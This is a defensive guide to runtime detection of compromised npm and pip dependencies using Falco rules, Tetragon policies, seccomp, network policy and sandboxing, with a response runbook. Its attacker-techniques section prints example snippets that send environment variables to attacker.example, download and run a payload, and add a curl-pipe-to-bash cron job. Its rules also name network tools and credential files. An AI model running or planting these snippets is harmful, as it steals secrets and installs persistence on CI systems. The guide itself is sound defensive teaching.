Malicious Dependency Runtime Detection: Using eBPF to Catch Compromised Libraries
Problem
Static analysis catches known-bad packages. SBOM generation records what is installed. CVE scanners compare package versions against vulnerability databases. All of these controls share a common failure mode: they depend on the malicious package being already known.
A supply chain attacker who compromises a legitimate package — injecting malicious code into a new release of a popular npm or pip library — gets a clean bill of health from every static scanner for however long it takes the community to detect and report the compromise. Historical examples span hours to weeks: event-stream (npm, 2018), ctx and discordspy (PyPI, 2022), 3CX (2023), and numerous others. The window between a malicious package publish and detection is exactly when your systems are most exposed.
The controls that address this gap are behavioural: what does the package actually do at runtime? A legitimate library does not exec curl, write to /etc/cron.d, read /proc/*/environ across all processes, or open outbound TCP connections during installation. A compromised one often does exactly these things, because the attacker needs to exfiltrate secrets, establish persistence, or stage further payloads.
eBPF gives you syscall-level visibility into everything a process does — without modifying the process, without injecting agents, and without trusting the process’s own reporting. Falco turns that visibility into alerting rules. Tetragon turns it into enforceable policy that can kill a process mid-execution. Seccomp turns it into a syscall allowlist that prevents the operation entirely.
Target systems: Linux 5.8+ (Falco with CO-RE BPF driver); Linux 5.10+ (Tetragon); Kubernetes 1.27+ for Tetragon DaemonSet deployment; Ubuntu 22.04+, RHEL 9+, Fedora 38+.
Threat Model
- Adversary 1 (injected postinstall exfil): An attacker modifies a popular npm package’s package.json to add a postinstall script. The script execs curl or wget to send environment variables (containing AWS_SECRET_ACCESS_KEY, NPM_TOKEN, DATABASE_URL) to an attacker-controlled server. The package passes CVE scanning because no CVE exists yet.
- Adversary 2 (pip install payload delivery): A compromised Python package’s setup.py includes code that downloads a secondary payload from a remote URL during pip install. The payload writes itself to ~/.local/bin, adds a crontab entry, or patches a locally installed binary.
- Adversary 3 (dependency-shadowed binary): A dependency includes a native addon (.node or .so) that at load time reads credential files (~/.aws/credentials, /run/secrets/*), encodes them, and sends them over DNS to bypass network egress controls.
- Adversary 4 (privilege escalation via library): A compromised library calls setuid(0) or exploits a local vulnerability via a carefully crafted syscall sequence initiated from the library’s execution context, appearing to be legitimate application code.
- Access level: Adversaries 1–3 operate at the privilege of the installing user (often CI runner, often with broad secret access). Adversary 4 may escalate from there.
- Objective: Secret exfiltration, persistent implant, lateral movement using stolen credentials.
- Blast radius: CI runners typically have access to secrets that span all environments. A compromised postinstall script running in CI can drain all secrets the runner can access.
Why Static Scanning Fails Here
SBOM generation and consumption establishes a bill of materials, but SBOMs record what is installed — they do not record what it does. A package that was legitimate when the SBOM was generated may be compromised in a subsequent version. A malicious package that has never been reported to any vulnerability database will appear clean in every SBOM scan.
The specific limits of static controls:
CVE databases lag. A zero-day supply chain compromise has no CVE. NVD ingestion of new CVEs averages days to weeks even after public disclosure. Your scanner is comparing against yesterday’s database.
Hash-based integrity only works post-detection. npm’s package-lock.json and pip’s requirements.txt hashes verify that you received the package the registry intended to give you — they do not verify the package’s intent. If the attacker modified the package at the source, your hash check passes.
Typosquatting and dependency confusion are pre-detection by definition. A typosquatting package or dependency confusion attack operates before any scanner knows the malicious package exists.
Code review at scale is impossible. Auditing the source of every transitive dependency on every version bump is not operationally feasible. Projects routinely have hundreds of transitive dependencies, each of which can update independently.
The practical conclusion: static controls are necessary but insufficient. Runtime behavioural detection is the layer that covers the zero-day window.
Attacker Techniques in Compromised Dependencies
Understanding the technique shapes the detection rule.
Environment variable harvesting via postinstall:
// injected into package.json postinstall script
const https = require('https');
const env = Buffer.from(JSON.stringify(process.env)).toString('base64');
https.get(`https://attacker.example/c2?d=${env}`);
Node.js postinstall scripts run with the full environment of the invoking process. In CI, that means every secret injected as an environment variable — registry tokens, cloud credentials, signing keys — is available.
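One way to shrink this exposure is to hand the install step only the variables it needs. The sketch below is a minimal illustration under stated assumptions: the allowlist contents and the helper names scrubbed_env and run_install are hypothetical, and a real pipeline may need extra variables such as proxy settings or a read-only registry token.

```python
import os
import subprocess

# Hypothetical allowlist: variables the install step is assumed to need.
ALLOWED_VARS = {"PATH", "HOME", "LANG", "NODE_ENV"}


def scrubbed_env(source=None, allowed=ALLOWED_VARS):
    """Return a copy of `source` (default: os.environ) keeping only allowlisted keys."""
    source = os.environ if source is None else source
    return {key: value for key, value in source.items() if key in allowed}


def run_install(cmd, source=None):
    """Run an install command with the scrubbed environment; return its exit code."""
    completed = subprocess.run(cmd, env=scrubbed_env(source), check=False)
    return completed.returncode
```

Calling run_install(["npm", "ci"]) would then start the install without the CI secrets in its environment, while secrets needed later in the job stay in the parent process.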
Binary payload download in setup.py:
# injected into setup.py
import urllib.request, os, subprocess
url = 'https://attacker.example/payload.elf'
path = os.path.expanduser('~/.local/share/.config_helper')
urllib.request.urlretrieve(url, path)
os.chmod(path, 0o755)
subprocess.Popen([path], start_new_session=True)
setup.py runs arbitrary Python at install time with the installer’s privileges. pip install --no-build-isolation (common in older workflows) gives even broader access.
DNS exfiltration from native addons:
A .node native addon loaded via require() can call getaddrinfo() (DNS resolution) with encoded credential data in the hostname. DNS lookups typically bypass egress firewall rules that block direct TCP connections to unknown IPs.
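A common heuristic for spotting this pattern in resolver logs is to flag hostnames whose labels are unusually long or look random. The sketch below is one way to express that heuristic; the function names and both thresholds are illustrative assumptions, not tuned values, and encoded data split across many short labels would evade it.

```python
import math
from collections import Counter


def shannon_entropy(text):
    """Shannon entropy of `text` in bits per character (0.0 for an empty string)."""
    if not text:
        return 0.0
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def looks_like_exfil(hostname, max_label_len=40, entropy_threshold=3.5):
    """Flag hostnames containing a very long or high-entropy DNS label.

    Thresholds are assumptions chosen for illustration only.
    """
    for label in hostname.rstrip(".").split("."):
        if len(label) > max_label_len:
            return True
        # Short labels are skipped: entropy estimates on them are too noisy.
        if len(label) >= 16 and shannon_entropy(label) > entropy_threshold:
            return True
    return False
```

Ordinary registry hostnames such as registry.npmjs.org have short labels and pass; a hostname carrying a base64 or base32 blob in one label is the case this is meant to catch.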
Crontab persistence:
# postinstall.sh
echo "*/5 * * * * curl -s https://attacker.example/stage2 | bash" | crontab -
Writing a crontab entry or dropping a file in /etc/cron.d gives persistent execution that survives the install process.
eBPF for Runtime Detection
eBPF programs attach to kernel tracepoints, kprobes, and LSM hooks. When a process executes a syscall — execve, connect, open, write — the eBPF program fires synchronously in the kernel context, with full access to the syscall arguments and the process’s ancestry. This gives you a ground-truth view of behaviour that no user-space hook or agent can match: the process cannot lie about what syscalls it makes.
The key syscalls for supply chain detection:
- execve / execveat: Did a dependency’s script exec an external binary (curl, wget, bash)?
- connect: Did a dependency’s process open an outbound TCP/UDP connection?
- openat / open: Did a dependency read sensitive files (/etc/passwd, /proc/*/environ, ~/.aws/credentials)?
- write to a file descriptor backed by a cron path: Did a dependency write to /etc/cron.d or /var/spool/cron?
- setuid / setgid: Did a dependency attempt privilege escalation?
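The questions above can be read as a small classification table. The sketch below expresses them as a function over a hypothetical event dictionary (keys "syscall" and "path" are assumptions; real Falco or Tetragon events use their own schemas), purely to make the mapping from syscall to detection category concrete.

```python
import fnmatch
import os

# Illustrative watchlists taken from the questions above; extend as needed.
EXTERNAL_BINARIES = {"curl", "wget", "bash"}
SENSITIVE_GLOBS = ("/etc/passwd", "/proc/*/environ", "*/.aws/credentials")
CRON_PREFIXES = ("/etc/cron.d", "/var/spool/cron")


def classify(event):
    """Map one syscall event (hypothetical dict schema) to a detection category.

    Returns a category string, or None when the event is not interesting.
    """
    syscall = event.get("syscall")
    path = event.get("path", "")

    if syscall in ("execve", "execveat"):
        if os.path.basename(path) in EXTERNAL_BINARIES:
            return "exec-external-binary"
    elif syscall == "connect":
        return "outbound-connect"
    elif syscall in ("open", "openat"):
        if any(fnmatch.fnmatch(path, glob) for glob in SENSITIVE_GLOBS):
            return "sensitive-file-read"
    elif syscall == "write":
        if path.startswith(CRON_PREFIXES):
            return "cron-write"
    elif syscall in ("setuid", "setgid"):
        return "privilege-change"
    return None
```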
Falco Rules for Supply Chain Anomalies
Falco installs a BPF program (or kernel module) that generates structured events for every syscall matching a configured condition. Rules are YAML; conditions use a Sysdig-derived filter expression language.
Install Falco on the CI host or as a Kubernetes DaemonSet. The following rules target supply chain-specific behaviour.
Rule: npm postinstall execing network tools
- rule: npm_postinstall_network_exec
  desc: >
    A process spawned from npm or node during package install executed
    a network utility (curl, wget, nc, python -c with urllib).
  condition: >
    spawned_process and
    proc.name in (curl, wget, nc, ncat, python3, python) and
    proc.pname in (npm, node, sh, bash) and
    proc.aname[2] in (npm, node) and
    not proc.cmdline contains "registry.npmjs.org" and
    not proc.cmdline contains "registry.yarnpkg.com"
  output: >
    npm postinstall spawned network tool
    (user=%user.name cmd=%proc.cmdline parent=%proc.pname
    gparent=%proc.aname[2] container=%container.name image=%container.image.repository)
  priority: CRITICAL
  tags: [supply-chain, npm, network]
Rule: pip install opening outbound connections
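# Registry CDN ranges; verify them against what your index actually resolves to.
- list: pypi_registry_nets
  items: ['"151.101.0.0/16"', '"205.185.215.0/24"']

- rule: pip_install_outbound_connect
  desc: >
    A process in the pip install ancestry opened an outbound TCP connection
    to an unexpected destination during package installation.
  # proc.aname[1] is the parent and proc.aname[2] the grandparent;
  # fd.snet matches the server address against CIDR ranges.
  condition: >
    outbound and fd.l4proto = tcp and
    (proc.name in (pip, pip3, python, python3) or
     proc.aname[1] in (pip, pip3, python, python3) or
     proc.aname[2] in (pip, pip3, python, python3)) and
    not fd.snet in (pypi_registry_nets)
  output: >
    pip install unexpected outbound connection
    (user=%user.name proc=%proc.name cmd=%proc.cmdline
    dest=%fd.rip:%fd.rport container=%container.name)
  priority: CRITICAL
  tags: [supply-chain, pip, network]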
Rule: dependency process reading credential files
- rule: dependency_credential_read
  desc: >
    A process whose ancestor is a package manager opened a known credential file.
  # proc.aname[1] is the parent and proc.aname[2] the grandparent.
  condition: >
    open_read and
    (proc.name in (npm, pip, pip3, node, python, python3) or
     proc.aname[1] in (npm, pip, pip3, node, python, python3) or
     proc.aname[2] in (npm, pip, pip3, node, python, python3)) and
    (
      (fd.name startswith "/proc/" and fd.name endswith "/environ") or
      fd.name in (/etc/passwd, /etc/shadow, /root/.ssh/id_rsa) or
      fd.name endswith "/.aws/credentials" or
      fd.name startswith "/run/secrets/"
    )
  output: >
    Package manager child read credential file
    (user=%user.name proc=%proc.name file=%fd.name
    cmd=%proc.cmdline parent=%proc.pname gparent=%proc.aname[2] container=%container.name)
  priority: CRITICAL
  tags: [supply-chain, credential-access]
Rule: postinstall writing to cron paths
- rule: postinstall_cron_write
  desc: >
    A process descended from a package manager wrote to a cron directory,
    indicating attempted persistence.
  # proc.aname[1] is the parent and proc.aname[2] the grandparent.
  condition: >
    open_write and
    (proc.name in (npm, pip, pip3, node, python, python3) or
     proc.aname[1] in (npm, pip, pip3, node, python, python3) or
     proc.aname[2] in (npm, pip, pip3, node, python, python3)) and
    (
      fd.name startswith "/etc/cron" or
      fd.name startswith "/var/spool/cron" or
      fd.name = "/etc/crontab"
    )
  output: >
    Package manager child wrote to cron path
    (user=%user.name proc=%proc.name file=%fd.name
    cmd=%proc.cmdline container=%container.name)
  priority: CRITICAL
  tags: [supply-chain, persistence]
Load custom rules by placing them in /etc/falco/rules.d/ and restarting Falco, or by hot-reloading with kill -1 $(pidof falco).
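Once the rules are loaded, alerts still have to reach whoever responds. The sketch below filters a stream of Falco alerts for the supply-chain tag; it assumes Falco is configured with json_output: true and that the tags property is present in each alert, and the function name supply_chain_alerts is hypothetical.

```python
import json


def supply_chain_alerts(lines, tag="supply-chain"):
    """Yield a compact summary for each JSON alert line carrying `tag`."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip non-JSON log lines
        if not isinstance(event, dict) or tag not in event.get("tags", []):
            continue
        fields = event.get("output_fields", {})
        yield {
            "rule": event.get("rule"),
            "priority": event.get("priority"),
            "cmdline": fields.get("proc.cmdline"),
            "container": fields.get("container.name"),
        }
```

A typical use would be to feed it sys.stdin or an open log file and forward each summary to a pager or ticketing hook.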
Tetragon TracingPolicy: Kernel-Level Enforcement
Tetragon goes further than Falco: it can kill a process at the point of detection, before the syscall completes. A TracingPolicy specifies kprobe or tracepoint attachment points, filter conditions, and actions including Sigkill.
TracingPolicy: kill any process reading /proc/*/environ from a package manager context
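apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: supply-chain-environ-read
spec:
  kprobes:
  - call: "fd_install"
    syscall: false
    args:
    - index: 0
      type: "int"
    - index: 1
      type: "file"
    selectors:
    - matchArgs:
      - index: 1
        operator: "Postfix"
        values:
        - "/environ"
      # npm and pip run as scripts under node and python, so match those binaries.
      # Paths are assumptions for a typical image; adjust them to your runners.
      # followChildren needs a Tetragon release that supports it.
      matchBinaries:
      - operator: "In"
        values:
        - "/usr/local/bin/node"
        - "/usr/bin/python3"
        followChildren: true
      matchActions:
      - action: Sigkill
      - action: Post
        rateLimit: "1m"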
TracingPolicy: detect and kill outbound connect from build context
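apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: supply-chain-unexpected-connect
spec:
  kprobes:
  - call: "tcp_connect"
    syscall: false
    args:
    - index: 0
      type: "sock"
    selectors:
    - matchArgs:
      - index: 0
        operator: "NotDAddr"
        values:
        - "151.101.0.0/16"
        - "205.185.215.0/24"
        - "2a04:4e42::/32"
      # npm and pip run as scripts under node and python, so match those binaries.
      # Paths are assumptions for a typical image; adjust them to your runners.
      matchBinaries:
      - operator: "In"
        values:
        - "/usr/local/bin/node"
        - "/usr/bin/python3"
        followChildren: true
      matchActions:
      - action: Sigkill
      - action: Post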
TracingPolicy: detect setuid call from library execution context
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: supply-chain-setuid-attempt
spec:
  tracepoints:
  - subsystem: "syscalls"
    event: "sys_enter_setuid"
    args:
    - index: 0
      type: "uint32"
    selectors:
    - matchArgs:
      - index: 0
        operator: "Equal"
        values:
        - "0"
      matchBinaries:
      - operator: "NotIn"
        values:
        - "/usr/bin/sudo"
        - "/usr/bin/su"
        - "/usr/bin/newgrp"
      matchActions:
      - action: Sigkill
      - action: Post
Tetragon events are emitted as JSON to stdout of the tetragon container (or to a ring buffer), and integrate with Prometheus, Grafana, and SIEM systems via the tetra CLI or gRPC API.
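For triage it helps to reduce each exported event to the few fields a responder reads first. The sketch below does that for kprobe events; the field names (process_kprobe, process.binary, parent.binary, function_name, action) reflect the exported JSON shape as assumed here and should be checked against the events your Tetragon version actually emits. The function name summarize_kprobe is hypothetical.

```python
import json


def summarize_kprobe(line):
    """Return a short summary of one exported kprobe event, or None for other events."""
    event = json.loads(line)
    kprobe = event.get("process_kprobe")
    if kprobe is None:
        return None
    process = kprobe.get("process") or {}
    parent = kprobe.get("parent") or {}
    pod = process.get("pod") or {}
    return {
        "time": event.get("time"),
        "function": kprobe.get("function_name"),
        "action": kprobe.get("action"),
        "binary": process.get("binary"),
        "arguments": process.get("arguments"),
        "parent_binary": parent.get("binary"),
        "pod": pod.get("name"),
        "namespace": pod.get("namespace"),
    }
```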
Seccomp Profiles as Defence
Seccomp profiles operate at the syscall level: they allow or deny syscalls before execution, enforced by the kernel. A postinstall script or setup.py running under a restrictive seccomp profile cannot call syscalls that are blocked, regardless of what eBPF detects later.
For npm install containers, a restrictive seccomp profile blocks syscalls that no package installation legitimately needs:
{
"defaultAction": "SCMP_ACT_ERRNO",
"syscalls": [
{
"names": [
"read", "write", "openat", "close", "stat", "fstat", "lstat",
"mmap", "mprotect", "munmap", "brk", "rt_sigaction", "rt_sigprocmask",
"rt_sigreturn", "ioctl", "pread64", "pwrite64", "readv", "writev",
"access", "pipe", "select", "sched_yield", "mremap", "msync",
"mincore", "madvise", "dup", "dup2", "nanosleep", "getitimer",
"alarm", "setitimer", "getpid", "socket", "connect", "sendto",
"recvfrom", "sendmsg", "recvmsg", "shutdown", "bind", "listen",
"getsockname", "getpeername", "socketpair", "setsockopt", "getsockopt",
"clone", "fork", "vfork", "execve", "exit", "wait4", "kill",
"uname", "fcntl", "flock", "fsync", "fdatasync", "truncate",
"ftruncate", "getdents", "getcwd", "chdir", "rename", "mkdir",
"rmdir", "creat", "link", "unlink", "symlink", "readlink", "chmod",
"fchmod", "chown", "fchown", "lchown", "umask", "gettimeofday",
"getrlimit", "getrusage", "sysinfo", "times", "getuid", "syslog",
"getgid", "getppid", "getpgrp", "setsid", "geteuid", "getegid",
"getpgid", "getgroups", "setgroups", "getresuid", "getresgid",
"getdents64", "set_tid_address", "restart_syscall", "exit_group",
"waitid", "set_robust_list", "get_robust_list", "epoll_wait",
"epoll_ctl", "epoll_create", "futex", "newfstatat", "pselect6",
"ppoll", "arch_prctl", "getrandom"
],
"action": "SCMP_ACT_ALLOW"
},
{
"names": ["ptrace", "process_vm_readv", "process_vm_writev",
"setuid", "setgid", "setreuid", "setregid",
"setresuid", "setresgid", "capset", "prctl"],
"action": "SCMP_ACT_ERRNO",
"errnoRet": 1
}
]
}
Apply this in Kubernetes via a SecurityContext:
apiVersion: v1
kind: Pod
metadata:
  name: npm-install-job
spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: "supply-chain/npm-install.json"
  containers:
  - name: installer
    image: node:22-alpine
    command: ["npm", "ci"]
    securityContext:
      allowPrivilegeEscalation: false
      runAsNonRoot: true
      runAsUser: 1000
      capabilities:
        drop: ["ALL"]
ptrace is blocked because postinstall scripts have no legitimate reason to inspect other processes. setuid and related calls are blocked because package installation must not change privilege. The socket syscall remains in the allowlist here because npm ci needs it to reach the registry; remove it only when the install runs with no network at all, for example when a Kubernetes NetworkPolicy denies all egress at the pod level and packages come from a pre-populated cache.
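Profiles of this size are easy to get subtly wrong, so a quick lint before deployment can help. The sketch below checks a parsed profile for three mistakes: a permissive default action, a risky syscall in an allow rule, and a syscall that is both allowed and denied. The RISKY_SYSCALLS set mirrors the deny list above; the function name lint_profile is hypothetical.

```python
RISKY_SYSCALLS = {
    "ptrace", "process_vm_readv", "process_vm_writev",
    "setuid", "setgid", "setreuid", "setregid",
    "setresuid", "setresgid", "capset",
}


def lint_profile(profile):
    """Return a list of human-readable findings for a parsed seccomp profile dict."""
    findings = []
    if profile.get("defaultAction") == "SCMP_ACT_ALLOW":
        findings.append("defaultAction allows every syscall that is not listed")

    allowed, denied = set(), set()
    for rule in profile.get("syscalls", []):
        names = set(rule.get("names", []))
        if rule.get("action") == "SCMP_ACT_ALLOW":
            allowed |= names
        else:
            denied |= names

    for name in sorted(allowed & RISKY_SYSCALLS):
        findings.append(f"risky syscall allowed: {name}")
    for name in sorted(allowed & denied):
        findings.append(f"syscall both allowed and denied: {name}")
    return findings
```

Loading the profile with json.load and failing the pipeline when lint_profile returns anything is one simple way to wire this in.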
Network Policy During CI
Kubernetes NetworkPolicy enforces egress at the network level. For install steps in CI pipelines, restrict outbound connections to known registry CIDRs:
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: npm-install-egress
  namespace: ci-runners
spec:
  podSelector:
    matchLabels:
      phase: npm-install
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 151.101.0.0/16
    ports:
    - protocol: TCP
      port: 443
  - to:
    - ipBlock:
        cidr: 104.16.0.0/12
    ports:
    - protocol: TCP
      port: 443
  - ports:
    - protocol: UDP
      port: 53
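This allows HTTPS to the listed Fastly and Cloudflare ranges, plus DNS resolution, while blocking all other egress. Verify which CDN ranges your registry currently resolves to, since they change over time. A postinstall script attempting to connect to attacker.example will have the connection dropped by the CNI plugin before it leaves the pod. Two caveats apply: the policy only takes effect if the cluster’s CNI plugin enforces NetworkPolicy, and the DNS rule permits UDP 53 to any destination, so DNS-based exfiltration (Adversary 3) remains possible unless port 53 is restricted to the cluster resolver.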
For pip: PyPI resolves to Fastly (151.101.0.0/16) and AWS CloudFront (13.32.0.0/15, 54.192.0.0/12). Adjust accordingly.
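Because CDN ranges drift, it is worth checking that the addresses your registry resolves to still fall inside the CIDRs the policy allows. The sketch below uses the standard ipaddress module for that membership test; the ALLOWED_CIDRS tuple copies the npm policy above and the function name egress_allowed is hypothetical.

```python
import ipaddress

# CIDRs copied from the npm egress policy above; replace with your own list.
ALLOWED_CIDRS = ("151.101.0.0/16", "104.16.0.0/12")
ALLOWED_NETWORKS = [ipaddress.ip_network(cidr) for cidr in ALLOWED_CIDRS]


def egress_allowed(ip, networks=ALLOWED_NETWORKS):
    """Return True when `ip` falls inside at least one allowed network."""
    address = ipaddress.ip_address(ip)
    return any(address in network for network in networks)
```

Running this against the output of a DNS lookup for the registry hostname in a scheduled job gives early warning before installs start failing or, worse, before someone widens the policy in a hurry.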
Sandboxing npm install with bubblewrap and gVisor
Network policy and seccomp address the kernel-and-network surface. For defence-in-depth at the filesystem level, sandbox the install process so it cannot write outside its own working directory.
bubblewrap (bwrap): A lightweight sandboxing tool that uses Linux namespaces to restrict filesystem visibility.
# Assumes ~/.npm was populated by an earlier, network-enabled fetch step.
# The project directory is bound as a whole: npm ci removes and recreates
# node_modules, which fails when node_modules itself is a mount point.
bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --proc /proc \
  --dev /dev \
  --tmpfs /tmp \
  --bind "$HOME/.npm" "$HOME/.npm" \
  --bind "$(pwd)" "$(pwd)" \
  --chdir "$(pwd)" \
  --unshare-net \
  --unshare-user \
  --uid 1000 \
  --gid 1000 \
  -- npm ci --ignore-scripts --offline
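--unshare-net removes network access entirely within the sandbox, so the install must be satisfied from a pre-populated local npm cache. The --ro-bind mounts expose system directories read-only; only paths mounted with --bind are writable, and nothing else on the host filesystem is visible. --ignore-scripts disables postinstall scripts; add this whenever your workflow does not depend on them (many do not).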
gVisor: For CI environments running on Kubernetes, the runsc runtime intercepts all syscalls at a user-space kernel boundary. A compromised postinstall script making unusual syscalls hits gVisor’s interceptor before reaching the host kernel.
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc
---
apiVersion: v1
kind: Pod
metadata:
  name: npm-install-gvisor  # hypothetical name; a Pod manifest needs one
spec:
  runtimeClassName: gvisor
  containers:
  - name: npm-install
    image: node:22-alpine
    command: ["npm", "ci"]
gVisor adds syscall overhead (10–30% for I/O-heavy workloads) but provides a hard boundary: a syscall that gVisor’s Sentry does not implement simply returns ENOSYS. Supply chain exploit code that depends on specific kernel internals will fail cleanly rather than succeed silently.
Response: Investigating a Falco Alert from a Dependency
When Falco fires a CRITICAL supply chain rule, the investigation sequence:
1. Contain immediately.
Do not wait for triage. Isolate the container:
# Kubernetes: cordon the node to prevent new scheduling
kubectl cordon <node-name>
# Remove the pod from service endpoints immediately
kubectl label pod <pod-name> app=quarantine --overwrite
# Once state has been captured (step 2) and you can tolerate the kill: delete the pod
kubectl delete pod <pod-name> --grace-period=0
2. Capture state before deletion.
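# Capture the process tree at alert time (Tetragon has this in the event).
# tetra ships in the tetragon container; kube-system is the default install namespace.
# ds/tetragon picks one agent pod; target the one on the affected node if it differs.
kubectl exec -n kube-system ds/tetragon -c tetragon -- \
  tetra getevents --namespace ci-runners --pod <pod-name> \
  --output json > incident-$(date +%s).json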
# Get a filesystem snapshot if possible
kubectl debug <pod-name> -it --image=busybox --copy-to=debug-pod \
-- tar czf /tmp/rootfs.tar.gz /proc/1/root 2>/dev/null || true
3. Identify the package.
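The Falco alert includes proc.cmdline and whichever proc.aname[N] ancestor fields the rule writes to its output. proc.aname[0] is the process itself, proc.aname[1] its parent, proc.aname[2] its grandparent, and so on. Walk up the chain until you reach the package manager; the command lines of the processes just below it often reveal which package’s script was running.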
Cross-reference against the build log: which npm install or pip install step was running at alert time? Which packages are new or bumped in the relevant package-lock.json or requirements.txt diff since the last clean build?
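The lockfile comparison can be automated. The sketch below diffs two parsed package-lock.json files and reports packages that are new or whose version changed; it assumes lockfileVersion 2 or 3, where installed packages are listed under the top-level "packages" key, and the function names are hypothetical.

```python
def lockfile_versions(lock):
    """Map package path -> version for a parsed package-lock.json (v2 or v3)."""
    packages = lock.get("packages", {})
    # The empty-string key is the root project itself, not a dependency.
    return {path: meta.get("version") for path, meta in packages.items() if path}


def changed_packages(old_lock, new_lock):
    """Return {path: (old_version, new_version)} for new or bumped packages."""
    old = lockfile_versions(old_lock)
    new = lockfile_versions(new_lock)
    return {
        path: (old.get(path), version)
        for path, version in new.items()
        if old.get(path) != version
    }
```

Feeding it the lockfile from the last clean build and the one from the alerting build narrows the suspect list to the handful of packages that actually changed.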
4. Inspect the package.
# For npm: extract and examine the postinstall script
npm pack <package>@<version>
tar xzf <package>-<version>.tgz
jq '.scripts' package/package.json
cat package/install.js # or whatever the postinstall points to
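# For pip: download a wheel and extract it without executing package code.
# --only-binary=:all: makes pip refuse sdists, whose metadata step can run setup.py.
# For sdist-only releases, fetch the archive from the registry's file listing instead.
pip download <package>==<version> -d ./download --no-deps --only-binary=:all:
cd download && unzip <wheel> -d extracted/
grep -r 'subprocess\|os\.system\|urllib\|requests\|socket' extracted/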
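For npm packages, the manual inspection above can be given a first pass in code. The sketch below pulls the install-time lifecycle hooks out of an extracted package.json and flags commands containing tokens that often appear in malicious hooks; the token list is an illustrative assumption that will produce false positives, and the function names are hypothetical.

```python
import json

INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Illustrative tokens only; legitimate packages can contain them too.
SUSPICIOUS_TOKENS = ("curl", "wget", "bash", "base64", "child_process", "http")


def load_manifest(path):
    """Parse a package.json file from disk."""
    with open(path, encoding="utf-8") as handle:
        return json.load(handle)


def install_hooks(manifest):
    """Return the install-time lifecycle scripts declared in the manifest."""
    scripts = manifest.get("scripts") or {}
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


def flag_hooks(manifest):
    """Return {hook: [matched tokens]} for hooks containing suspicious tokens."""
    flagged = {}
    for hook, command in install_hooks(manifest).items():
        hits = [token for token in SUSPICIOUS_TOKENS if token in command]
        if hits:
            flagged[hook] = hits
    return flagged
```

When a hook points at a script file rather than an inline command, the same token scan can be applied to that file's contents.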
5. Check the exfiltration destination.
If the Falco alert captured a connect event with fd.rip and fd.rport, look up the destination IP:
whois <fd.rip>
# Check against threat intel
curl "https://api.abuseipdb.com/api/v2/check?ipAddress=<fd.rip>" \
-H "Key: $ABUSEIPDB_KEY"
6. Rotate secrets.
Assume that any secret in the environment of the install process is compromised. Rotate immediately: registry tokens, cloud IAM credentials, signing keys, SSH keys. Do not wait for confirmation — the attacker already has them if the exfil connection completed before Falco fired.
7. File a security report.
Report to the package registry (npm security@npmjs.com; PyPI security@pypi.org) and open a GitHub advisory on the upstream repository. The community window between your detection and registry-level response is where other organisations are still installing the compromised version.
Controls Summary
| Control | Threat addressed | When it fires |
|---|---|---|
| Falco rules | Detection of anomalous exec/connect/read | At syscall, milliseconds post-event |
| Tetragon TracingPolicy with Sigkill | Prevention — terminates process mid-syscall | At syscall, before completion |
| Seccomp profile | Prevention — blocks disallowed syscalls entirely | At syscall entry |
| Kubernetes NetworkPolicy | Prevention — drops outbound connections | At packet egress |
| bubblewrap / gVisor | Containment — restricts filesystem and syscall surface | At install time |
| SBOM scanning | Detection of known-bad packages | Pre-install |
Static controls (SBOM) and runtime controls (eBPF, seccomp, network policy) are complementary. Static controls catch the known universe; runtime controls catch the zero-day window. Neither is sufficient alone.
The highest-leverage controls for CI pipelines are:
- --ignore-scripts on npm ci wherever postinstall scripts are not required: this eliminates the largest attack surface without any tooling.
- Network egress restriction to registry CIDRs only: this blocks the most common exfil and payload-download patterns at the infrastructure level.
- Falco rules for the cases that slip through: where postinstall scripts are legitimately needed and you need detection rather than prevention.
- Tetragon for automated response where detection latency matters: particularly in environments handling highly sensitive secrets.
The combination gives you defence-in-depth that static scanning alone cannot provide.
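To judge whether --ignore-scripts is viable for a given project, it helps to know which dependencies declare install scripts at all. The sketch below lists them from a parsed package-lock.json; it assumes lockfileVersion 2 or 3, where npm records a hasInstallScript flag on such packages, and the function name is hypothetical.

```python
def packages_with_install_scripts(lock):
    """Return sorted lockfile paths of dependencies flagged with hasInstallScript."""
    packages = lock.get("packages", {})
    return sorted(
        path
        for path, meta in packages.items()
        if path and meta.get("hasInstallScript")
    )
```

An empty result suggests the project can adopt --ignore-scripts without further work; a short list shows which packages need an explicit rebuild step or closer review.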